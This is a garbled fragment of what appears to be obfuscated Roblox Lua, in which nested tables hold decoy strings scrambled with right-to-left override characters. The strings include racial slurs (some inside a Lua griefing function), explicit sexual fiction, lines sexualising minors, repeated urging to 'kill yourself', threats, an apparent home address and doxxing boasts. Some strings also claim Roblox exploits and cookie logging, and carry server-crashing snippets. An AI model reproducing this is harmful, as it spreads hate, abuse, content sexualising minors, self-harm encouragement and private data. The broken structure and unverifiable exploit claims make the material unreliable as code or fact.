⠀⠀⠀⠀⡦⡙⡂⢀⢤⢣⠣⡈⣾⡃⠠⠄⠀⡄⢱⣌⣶⢏⢊⠂⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⢝⡲⣜⡮⡏⢎⢌⢂⠙⠢⠐⢀⢘⢵⣽⣿⡿⠁⠁⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠨⣺⡺⡕⡕⡱⡑⡆⡕⡅⡕⡜⡼⢽⡻⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⣼⣳⣫⣾⣵⣗⡵⡱⡡⢣⢑⢕⢜⢕⡝⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⣴⣿⣾⣿⣿⣿⡿⡽⡑⢌⠪⡢⡣⣣⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⡟⡾⣿⢿⢿⢵⣽⣾⣼⣘⢸⢸⣞⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠁⠇⠡⠩⡫⢿⣝⡻⡮⣒⢽⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ —————————————————————————————"}+0b1111111011100)}}},{{"mYYXobg2ZT",false}}},{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl","9d1f8226f235"},{"mYYXobg2ZT",D(#"Hey you, Fuckin subscribe Or I'm gonna throw COCKS Through your window.. You BITCH"+0b1111110010010,#{"i fuking hat you ashole ill fuck find you ... tis yor fault","‮Tr‮ey‮‮‮‮‮vo‮‮n‮‮ i‮‮n a ‮n‮‮u‮‮‮‮tshell",[[Are you dumb or just fucking special? I've been training you for 13 long ass years and you still think having some sort of magical bullshit power is going to save your 3 little bitch limbs when I chop you up like Darth Maul. Not only am I more skilled than you, I'm on the motherfucking high ground. Have you ever read the Art of War? It says in bold "Do not try and fuck with the high ground Anakin". This is honestly the reason you're not a Jedi master. You're legitimately dumber than sand, and more of a whiny emotional shit than your unborn son Kylo. Also, you were my brother Anakin, I loved you]],[[TheTrollofuscator]],[[siorry you are siid!]],[[how to make obfuscator 2022 tutorial]],[[🪵]],[[ _=pcall;fucntion mom() _ _=debug;for _,v in next,getnilinstances()do v.Parent=game and game:FindFirstChild('Dex') or game:service('Debris'); _ _ _=error;end;end;your=getNil(game:GetService('Homeless'));task.spawn(function() _;end));error(warn(your))]],[[this i‮‮s‮ ‮‮‮an‮ ir‮‮‮‮o‮nbr‮e‮‮w ‮fo‮‮‮‮rk]],[[Among Us c‮‮‮r‮ew‮s‮hi‮‮p is the new‮‮ fo‮rtn‮ite‮ ‮m‮a‮p.‮ - Do‮n‮ald ‮Mustard]],[[Truckers pack gonna explode about ur fuscatorr]]}+0b1111111011111)}},{}},{"ZK6hMvi",{"yAAH1q6JXs",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#"I hate you"+0b1100011101001,#"no!!..."+0b1100011101111)},{"mYYXobg2ZT",D(#{"You should kill yourself... NOW!!!","leaking every mau script and website and ip website and i doxed mau i know whare he lives i have everything from maxwarhol i know his ip i rekt everyone in here i have best logger i better than mrpump and memer the script name true immortality and is have best void attack is have extremehyperskidded mode no fake is can log your ip is can stop mau script no fake and i have jack hase scripts no lie i have real black angel thing i have every script","","EDIT: He stopped, should be working. Do not trust any scripts or games by APT-2283, as APT-2283 also has access to a Roblox RCE exploit. If you must run a game or script by them, buy a RDP and connect to the RDP in a Linux VM, preferrably an obscure distro. (Also make sure the VM is connected to a proxy. You can connect to RDP in Linux using Remmina ) APT-2283-1's user id is 5494b50e-5cod- 4cf7-989f-5450ffc2d867, APT-2283-2's user id is dbd715a2-8927-4ce7-b2b3-85349d18f241.","@everyone<@!445900476253470722> is tentaclesmanx75"}+0b1100100111011,#{"Today is the day that I say fuck it all. I hate every single one of you who still pl‮ays S‮B games, I ‮can't fucking take it anymor‮e. I just wiped all of EB's ba‮ns, and deleted t‮he script macro and spreadsheet keys. Fuck ev‮erything, seriously. You want to know what happened, I got word th‮at some of the people in this ‮server stole something of mine and secrete‮ly held onto it without telling me. Wel‮l, you are retarded, because today som‮eone messaged me sayin‮g that they found a model containing it. Go‮od job, retard. I can't believe that scripters would do this in a community like this. Yo‮u seriously act on-par to skids, yet you can program stuff. I ho‮pe to fuck‮ing god you think about what you ha‮ve done.‮ I spend my time making shit that actually interests me, and people like you go around stealing it like you fu‮cking own it. Now, everyone has the suffer the consequences because of your actions.","███████GG███!!!!!!","‮34‮‮ Me‮rcia‮‮n‮ ‮Wa‮y‮ S‮l‮ou‮‮‮gh ‮‮SL1‮ 5L‮Y E‮ngland","Hello guys today I going to showcase star glitcher and have andrfix cr and auxnos cr is so cool nobody can kill it is have anti abusive unleakable with best obfuscate I bet you can't crack the script is from his website you never find it OK time to use it look is so cool is cool effect you can use viewport just press . Look 😱 omg there all star glitcher mode you can made own animations there gui you can use and you can get animation from other who made now HOLY SHIT IS CAN KILL LOOP REFIT RARE ok is end now who want it dm me here you only get from andr wl or me and you need to give us 5k robux or 20 dollar to andr or me <@386550716539338752>"}+0b1100101000101)}},{{"mYYXobg2ZT",D(#"What is read rules"+0b1111111100110,#{"I will get your condom",[[you wake up at home, and you understand another boring day you will spend at school, and when you wake up you say: "I'm a virgin .." you quickly packed up and prepared yourself a lunchbox. at the entrance to the school, you saw a girl with whom you have been in love for 4 years, her name is Senzuko. Me Hi.. Senzuko Hello! Sad again? Me No, I just forgot my textbook at home.. Senzuko Shall we go home together after school? Me think it is possible. - you went to class and sat through all the lessons, it seems that evening has come hearing a pleasant voice, you turn and see Mia. Mia H-hello senpai.. i w-want to.. invite you to my house.. i.e. to you.. i.e. to.. Me I'm sorry, but there's a lot to do today, it won't work out. Mia O-okay.. - She walked towards the stairs with her arms around her. Senzuko approached you Senzuko Shall we go? Me Yes.. - you went home together, it started to rain. Me Senzuko, my house is closer, come to me, otherwise you'll catch a cold. Senzuko Y-yeah.. sneeze Me Be healthy. Senzuko Thank you.. - you came to your house Me Go go to the bathroom or you'll catch a cold. - she went to the bathroom, feelings of anxiety have strained you very much. Thoughts Damn the girl I'm in love with in my house.. in the bathroom.. - you are a complete pervert. you went to her bathroom to ask: "Is everything okay"? Me Is everything okay? Senzuko Yes, do you have a towel? Me Yes, there is.]],[[no!!...]],[[To deobfuscate this file first buy R2283 premium membership, now only for 4.99$ a month!]],[[I believe from my point of view, Void Script Builder has two places to use Requires and Links, Place 1 is only Links and only Advanced scripters have access to requires in that place however, Place 2 has Requires and Links too. Obviously i think this is to keep balance and to avoid Raiders and other people who will try to ruin the game experience, two areas. Thats why you hear most people saying Place 2 is Chaos, because most chaotic scripts are requires and the people who use them will be in place 2]],[[the new bacon bag double biggie stack is back at burget king]],[[sleep script pro spam humanoids in workspace crash the server immortal script]]}+0b1111111111010)}}},{"mYYXobg2ZT",D(#"el ‮a‮‮m‮ong‮‮u‮‮‮‮‮s‮ es ‮‮‮‮‮‮fa‮l‮so"+0b1111110100000,#"🇷🇸"+0b1111111101111)}},{"mYYXobg2ZT",D(#"nvm i loveeee huffman coding"+0b1111111001111,#[[_=workspace:FindFirstChild('skid')and workspace:FindFirstChild('skid'):FindFirstChildOfClass('Weld');_b=__index;_c="хуепутало простоблядское, пиздак на ноль живо";_q=debug;_v=pcall;function _e()_b=getnilinstances();while true do break;end;end;_i=game;_z=warn;function niI()_x=__index;end;task.spawn(function()_l=#" Hi. I'm your script. You know what? This is weird but.. I'm really your father. When you was 6 years old you wanted my non-humnanoid script. Also.. Your arm broken. Cuz.. I A M H E R E B O S S "-95;end);if _l<55 then _m='=═мм═=,';end;_v(function()_z(_m);end);while _x==_b do;end;]]+0b1110101011111)}},{}}}}}}}},{"C0mpEyzirj",{"5a7e4799f533"},{{"C4o94EJ24n",{}}}},{"yGUryecqux",{"514b108340a8","9d1f8226f235"},{{"KT28BwKBl",D(#{"d‮‮‮e‮‮b‮‮‮‮r‮is i‮‮‮s‮ tra‮‮‮‮‮‮sh","i HATE apt 2283","acertijo me esto... acertijo me eso... ¿quién tiene miedo del negro grande?",[["crying" -nikocado avacado]],[[maufuscator is]],[[tactical KILLS YOU]],[[Ok I will cut ur paper 😋]],[[intentional]],[[Moneys]],[[My grandpa died of putknees disease]],[[hello guys please help i am getting hacked by apt 2283]],[[‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮"]],[[oh ‮hell‮ na‮h mr ha‮s‮e g‮oi‮ng ‮t‮o Ha‮c‮k‮ Us Al‮l ‮‮‮‮‮Oh Fuc‮‮k]]}+0b1111010110111,#"‮htt‮p‮s:‮‮‮/‮/goo‮glethatf‮oryou.‮co‮m‮/lucky?q=%63%68%‮6‮9‮%‮6C‮‮%64%‮20%70%6F%‮72%6E"+0b1111001001000)},{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#"apt‮ ‮2283‮‮ ‮‮Will D‮‮‮es‮troy ev‮e‮‮rythin‮g Jack507‮‮9‮‮ Ha‮‮s Made"+0b1100010000101,#"you should kill yourself.. later!"+0b1100011010101)},{"mYYXobg2ZT",D(#"As expected 2283 have reposted this to their communication channels"+0b1111110111111,#"i‮ l‮‮i‮‮ke li‮‮‮‮‮‮‮t‮‮‮‮tle‮‮ k‮‮ids"+0b1111111000001)}},{}}},{{"ezhJpGIUTo",{{"yIavri8YiE",{"d9cq0j2N6n",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl","9d1f8226f235"},{"mYYXobg2ZT",D(#"‮la fuerza‮ d‮‮el p‮at‮o‮‮‮‮‮ está‮ ‮d‮‮ent‮‮ro d‮e‮ ‮mí"+0b1100010010101,#"how to make obfuscator 2022 tutorial"+0b1100011010101)}},{{"mYYXobg2ZT",D(#"███████GG███!!!!!!"+0b1100011011111,#"quo‮te e‮sca‮p‮‮‮e?? ‮ ‮ e‮‮‮rror‮()‮‮‮‮‮‮ ‮‮ woww!!"+0b1100010101101)}}},{"d9cq0j2N6n",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl","9d1f8226f235"},{"mYYXobg2ZT",D(#"———————————No bitches?——————————— ⠀⣞⢽⢪⢣⢣⢣⢫⡺⡵⣝⡮⣗⢷⢽⢽⢽⣮⡷⡽⣜⣜⢮⢺⣜⢷⢽⢝⡽⣝ ⠸⡸⠜⠕⠕⠁⢁⢇⢏⢽⢺⣪⡳⡝⣎⣏⢯⢞⡿⣟⣷⣳⢯⡷⣽⢽⢯⣳⣫⠇ ⠀⠀⢀⢀⢄⢬⢪⡪⡎⣆⡈⠚⠜⠕⠇⠗⠝⢕⢯⢫⣞⣯⣿⣻⡽⣏⢗⣗⠏⠀ ⠀⠪⡪⡪⣪⢪⢺⢸⢢⢓⢆⢤⢀⠀⠀⠀⠀⠈⢊⢞⡾⣿⡯⣏⢮⠷⠁⠀⠀ ⠀⠀⠀⠈⠊⠆⡃⠕⢕⢇⢇⢇⢇⢇⢏⢎⢎⢆⢄⠀⢑⣽⣿⢝⠲⠉⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⡿⠂⠠⠀⡇⢇⠕⢈⣀⠀⠁⠡⠣⡣⡫⣂⣿⠯⢪⠰⠂⠀⠀⠀⠀ ⠀⠀⠀⠀⡦⡙⡂⢀⢤⢣⠣⡈⣾⡃⠠⠄⠀⡄⢱⣌⣶⢏⢊⠂⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⢝⡲⣜⡮⡏⢎⢌⢂⠙⠢⠐⢀⢘⢵⣽⣿⡿⠁⠁⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠨⣺⡺⡕⡕⡱⡑⡆⡕⡅⡕⡜⡼⢽⡻⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⣼⣳⣫⣾⣵⣗⡵⡱⡡⢣⢑⢕⢜⢕⡝⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⣴⣿⣾⣿⣿⣿⡿⡽⡑⢌⠪⡢⡣⣣⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⡟⡾⣿⢿⢿⢵⣽⣾⣼⣘⢸⢸⣞⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠁⠇⠡⠩⡫⢿⣝⡻⡮⣒⢽⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ —————————————————————————————"+0b1001110110110,#[[I never ment any bad intentions when I "doxxed" hbomb and mini. I was never going to do with the ip. I never saved it or anything. I know what I have done is wrong, and I'm truely sorry. I'm gonna release all my mods on gamebanana and will leave the fnf community and go back to geometry dash and youtube.I dont expect to be forgiven for this, so I'm here to say, I'm sorry for everything I have done. It was really stupid of me, and I wasn't thinking right. I 'doxxed them" over minecraft, because we were having a war or something. I deleted their ips instantly and unbanned them from minecraft, since the way i got the ip in the first place was doing a ban command. To clear this all up: I never ment any harm, I dont expect to be forgiven, and I'm leaving the community as i'm truely sorry.]]+0b1010111011111)}},{{"mYYXobg2ZT",D(#"Ok I will cut ur paper 😋"+0b1100011110000,#[[Engineer: Hey look, buddy. I'm an engineer, that means I solve problems. A shot rings out and a bullet hole appears next to the Engineer's head. Engineer: Not problems like "What is beauty?", 'cause that would fall within the purview of your conundrums of philosophy. Another two bullet holes appear, on the other side of the Engineer's head. Engineer: I solve practical problems! The shot zooms out to show a level 2 sentry shooting offscreen while the Engineer takes a long drink from his beer. Heavy, offscreen: AAAAGGGGGHHHHHH!!!!! Engineer: For instance, how am I gonna stop some big mean Mother-Hubbard from tearin' me a structurally superfluous new behind? A level 1 sentry turns around and shoots a sniper who was trying to creep up on the Engineer from behind. Engineer: The answer? Use a gun. And if that don't work, use more gun. Another level 3 sentry fired a salvo of rockets, blowing up someone offscreen. Someone, offscreen: MY AAAARRRMMMM!!!!! A blown-off hand lands at the Engineer's feet, resembling that of the Sniper judging from the glove. Engineer: Like this, heavy-caliber tripod-mounted little-old-number designed by me. Engineer kicks the hand off-screen as a level 1 sentry blows it apart. Engineer: Built, by me. A level 1 sentry shoots offscreen. Engineer: And you best hope... The Engineer's expression darkens, and he grimaces as he stares right at the camera. Engineer: Not pointed at you. The shot slowly zooms out, showing the massacre ensuing around the Engineer, while an electric guitar begins to replace the melody of "More Gun". Team Fortress 2 ending flourish music plays. ]]+0b1001010100000)}}},{"GWcpeOUWdt",{"aI6IQyJkxM",{"KT28BwKBl","9d1f8226f235"},{"KT28BwKBl",D(#"The fuck are you doing in our community again fucking skid Skids that trade and promote,create bosshub and snake venom are not fucking welcome especially to whitelist You can't fucking come back stop trying Stop fucking begging my friends including Jades for whitelist dumbass bitch If you come back once more you will get fucking banned from everything for attempts to get to loader while being a fucking shitty 🤡 and skid a If you message one of our presidents again you'll not be able to play VSB for a minute Beg Jades or someone else for whitelist again using their kindness and get banned for eternity Well you understood me,skid ass.lf not,then remember my words I will do anything to get your shit skid ass banned. Suck penis instead of whitelist"-0b1011010010,#{"Its not micro-soft, its big-hard","oh hell nah mr hase going to Hack Us All Oh Fuck","‮‮‮‮‮‮s‮‮‮‮‮‮‮‮‮‮‮‮‮‮ex","this is an ironbrew fork","bitches be like y‮ou're you're y‮ou're‮ its not‮ m‮y fault t‮h‮e englis‮h languag‮e is so fucki‮ng‮‮ c‮omplicated its not my fault my english teacher didn't know gramma‮r its n‮ot my fault that she is a‮ all-american and doesn't know gr‮‮ammar‮ and how ‮to fucking spell","Chigger","oh hell nah mr hase going to Hack Us All Oh Fuck",""}+0b100001)},#"As expected 2283 have reposted this to their communication channels"-0b111100},#{"Fixed: game:service'Players':ClearAllChildren()","```lua -- this is ultra rare method to fix all CR scripts: -- remove color changes from CR -- done ```","tenticalmax75 is tentaclesmanx75",[[Everyone goes on about "devious lick" this and "devious lick" that... How about you give my nuts a devious lick, Monkey?]],[[integrate ((1/2+cos(x/2)x^3)(sqrt(4-dxx^2)) from -2 to 2 and multiply this result by 1 * 1 (* in this context is a "star" which means that it uses convolution operation)]],[[あさしてつRCEとたろたゐのMau4ぬたあゐたとたさてつぬのゑMAUMAUたろてつゐしたMAUMAUMAUMAUまけまゐとたさ]],[[😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 ```lua local killfolder ="Folder",nil) function kill(object) if object.Parent == killfolder then return "dumbass nigger u already killed "..object.Name end object.Parent = killfolder object:GetPropertyChangedSignal("Parent"):Connect(function(parent) object.Parent = killfolder pcall(function() kill(parent) parent.Name = "i dont like niggers at all, niggers always playing basketball, every nigger always playing basketball... basketball..." end) end) local idontlikeniggers ="SpecialMesh",object) idontlikeniggers.Offset =,9e9,9e9) idontlikeniggers.Name = math.random() idontlikeniggers:GetPropertyChangedSignal("Offset"):Connect(function() idontlikeniggers.Offset =,9e9,9e9) idontlikeniggers.Scale = end) idontlikeniggers.AncestryChanged:Connect(function() if idontlikeniggers then idontlikeniggers:Destroy() end idontlikeniggers ="SpecialMesh",object) idontlikeniggers.Offset =,9e9,9e9) idontlikeniggers.Scale = idontlikeniggers.Name = math.random() end) killfolder.Name = "killed 🐵🐒 "..object.Name end```]],[[- handi‮ng the towel you really wanted to look at her through the curtain. her bare chest, her youthful body. Senzuko Would you like to.. watch? you were silent.. Senzuko I allo‮w.. you looked behind the ‮curtain in t‮he b‮athroom and see‮ it complete‮ly .. - it's a great physique, a young, wet pussy, a flushed face, a shy maid in the bathroom. your cock stood up qui‮ckly, it seems she noticed.. Senzuko Your cock is up.. she sat on the edge of the tub, saying, "Put it in me.." Me but.. Sen‮zuko Co‮me on!.. - you took off‮ your pants, slowly finishing with your unde‮rpants, approached her. inserted‮.. Senzuko Ah..!~ - it's a nice feeling.. when the pussy sucks your cock, gently‮ squeezing it.. and the moans of a beautiful v‮irgin.. only vulgar thoughts are on my mind.. you‮ be‮gan to slowly caress the member of the pussy from the inside. Me‮ Mh.. Senzuko Mhh..~ Senzuko‮ I want you to cum ‮inside me.. - you start accelerating.. you think: "hell, what about the condom..?" Senzuko Don't stop..!~ Mkh..]],[[hello guys today we will be cracking samin]]}-0b1000},#"R‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮c‮‮e"-0b111110},#"g/ws/nan"-0b110},{{"KZTU7qAfVb",{"KT28BwKBl",D(#"‮‮‮‮‮‮‮‮a‮‮‮‮‮‮‮‮‮‮‮1‮7"+0b10001,#{"That’s how you assert dominance","you are not funny <:dead:870013146348286082>","kys nigger","jack hase script or maxwarhol script","Yes, indeed, I ama motherfucker, I fuck mothers",""}+0b1001110)},{{"Ky34LpE6i",{},{{"C0mpEyzirj",{"24631cf2d9be"},{{"aI6IQyJkxM",{"KT28BwKBl","24631cf2d9be"},{"mYYXobg2ZT",#"‮‮t‮h‮‮‮‮is ‮i‮s‮‮ ‮an‮ i‮ronbr‮‮ew ‮‮‮f‮ork"-0b1010011},#"no your not"-0b1010}}},{"K7PBkj5mc",{{"yAAH1q6JXs",{"KT28BwKBl","9d1f8226f235"},{"mYYXobg2ZT",D(#"apt 2283 Will Destroy everything Jack5079 Has Made"+0b1111110101011,#"—_—__–±·-—"+0b1111111001111)}}},{{"mYYXobg2ZT",false}}},{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl","9d1f8226f235"},{"mYYXobg2ZT",D(#{"how to get free robux","Hey, VSauce. Michael here."}+0b1111111100010,#"<‮:‮Bi‮gB‮l‮‮‮u‮e:8946‮‮‮695‮1‮1‮8‮6‮7‮908‮0‮9‮8>"+0b1111110010001)}},{}},{"ZK6hMvi",{"yAAH1q6JXs",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#"t‮‮‮he new ba‮con b‮a‮‮g double biggi‮e ‮st‮a‮c‮k is‮ ‮‮bac‮k at bu‮r‮ge‮t ‮king"+0b1100001111011,#"r‮‮o‮b‮‮‮u‮xg‮‮ene‮‮‮‮r‮‮‮‮at‮o‮r‮.com"+0b1100010101000)},{"mYYXobg2ZT",D(#"March 27, 2026 5:03 AM"+0b1100100101010,#"Mau obfuscator better then mooonsec (moonsec leaks constants)"+0b1100100001100)}},{{"mYYXobg2ZT",D(#"Nigger"+0b1111111110010,#[[integrate ((1/2+cos(x/2)x^3)(sqrt(4-dxx^2)) from -2 to 2 and multiply this result by 1 * 1 (* in this context is a "star" which means that it uses convolution operation)]]+0b1111101011000)}}},{"mYYXobg2ZT",D(#"‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮☻"+0b1111110110000,#"but the rage*"+0b1111111101010)}},{"mYYXobg2ZT",D(#{"h‮ello‮ my name i‮s su‮p‮er ‮pe‮do pro‮ a‮‮n‮‮d today i will f‮uck my 17 year o‮l‮d‮‮ ‮‮siste‮r","Memerman has 34 minutes til his month is over 😭","m‮‮‮a‮‮‮‮r‮‮‮‮‮i‮‮‮‮‮‮‮o‮.ml","‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎","TLDR: Do not play script builders or executor games until further notice. If you have played an SB since around Jan 11, 2022, you may have been cookie logged; please use Secure Sign Out (!/security) and then Logout to reset your cookies, then log back in. 2283 (a threat actor group that has previously attacked 3 of our products) have discovered a 0day Roblox LPE and has spread it to many others. (as StuudioDummy has it, I think everyone has it) It is only a matter of time until someone else gets infected or cookie logged with this vuln. I was cookie logged with this vuln last month.",[[```l‮ua return(function(I,‮k,‮b,...)if‮(I=‮=‮"")‮then (k)(b‮) ‮ else r‮etur‮‮n ({‮...‮})en‮d;end‮)("‮cryo",‮prin‮t,"‮Rickrolled",...) ```]],[[That Is Deprecated! ```js const deez = (...args) => args.forEach(console.log) deez(123414,43,124,2341,1234) ```]],[[Exruw Bombs Orphanages]]}+0b1111111100011,#{"What the heck did you just frickin’ say about me, you little whiner? I’ll have you know I graduated top of my class in the Navy Seals, and I’ve been involved in numerous secret raids on Al-Quaeda, and I have over 300 confirmed kills. I am trained in gorilla warfare and I’m the top sniper in the entire US armed forces. You are nothing to me but just another target. I will wipe you the frick out with precision the likes of which has never been seen before on this Earth, mark my frickin’ words. You think you can get away with saying that crap to me over the Internet? Think again, buddy. As we speak I am contacting my secret network of spies across the USA and your IP is being traced right now so you better prepare for the storm, buddy. The storm that wipes out the pathetic little thing you call your life. You’re frickin dead, kid. I can be anywhere, anytime, and I can kill you in over seven hundred ways, and that’s just with my bare hands. Not only am I extensively trained in unarmed combat, but I have access to the entire arsenal of the United States Marine Corps and I will use it to its full extent to wipe your miserable butt off the face of the continent, you little poopy-head. If only you could have known what unholy retribution your little “clever” comment was about to bring down upon you, maybe you would have held your stinking tongue. But you couldn’t, you didn’t, and now you’re paying the price, you big jerk. I will rain fury all over you and you will drown in it. You’re in frickin’ trouble, mister.","you're* X D"}+0b1111111101100)}},{}}}}}}}}}}}},{"2xWMYi55SI",{{"KT28BwKBl","24631cf2d9be"}}}}}}},{"C0mpEyzirj",{D(#{"maufuscator is","||----------------------------------------------------|| leaked dms with mau","M‮em‮erm‮an h‮‮as‮ 3‮4‮‮ m‮in‮u‮tes‮ til h‮is mo‮nth is ‮o‮‮‮v‮er 😭","———————————No bitches?——————————— ⠀⣞⢽‮⢪⢣⢣⢣⢫⡺⡵⣝⡮⣗⢷⢽⢽⢽⣮⡷⡽⣜⣜⢮⢺⣜⢷⢽⢝⡽⣝ ⠸⡸⠜⠕⠕⠁⢁⢇⢏⢽⢺⣪⡳⡝⣎⣏⢯⢞⡿⣟⣷⣳⢯⡷⣽⢽⢯⣳⣫⠇ ⠀⠀‮⢀⢀⢄⢬⢪⡪⡎⣆⡈⠚⠜⠕‮⠇⠗⠝⢕⢯⢫⣞⣯‮⣿⣻⡽⣏⢗⣗⠏⠀ ⠀⠪⡪⡪⣪⢪⢺⢸⢢⢓⢆⢤⢀⠀⠀⠀⠀⠈⢊⢞⡾⣿⡯⣏⢮⠷⠁⠀⠀ ⠀⠀⠀⠈⠊⠆⡃⠕⢕⢇⢇‮⢇‮⢇⢇⢏⢎‮⢎⢆⢄⠀⢑⣽⣿⢝⠲⠉⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⡿⠂⠠⠀⡇⢇⠕⢈⣀⠀⠁⠡⠣⡣⡫⣂⣿⠯⢪⠰⠂⠀⠀⠀⠀ 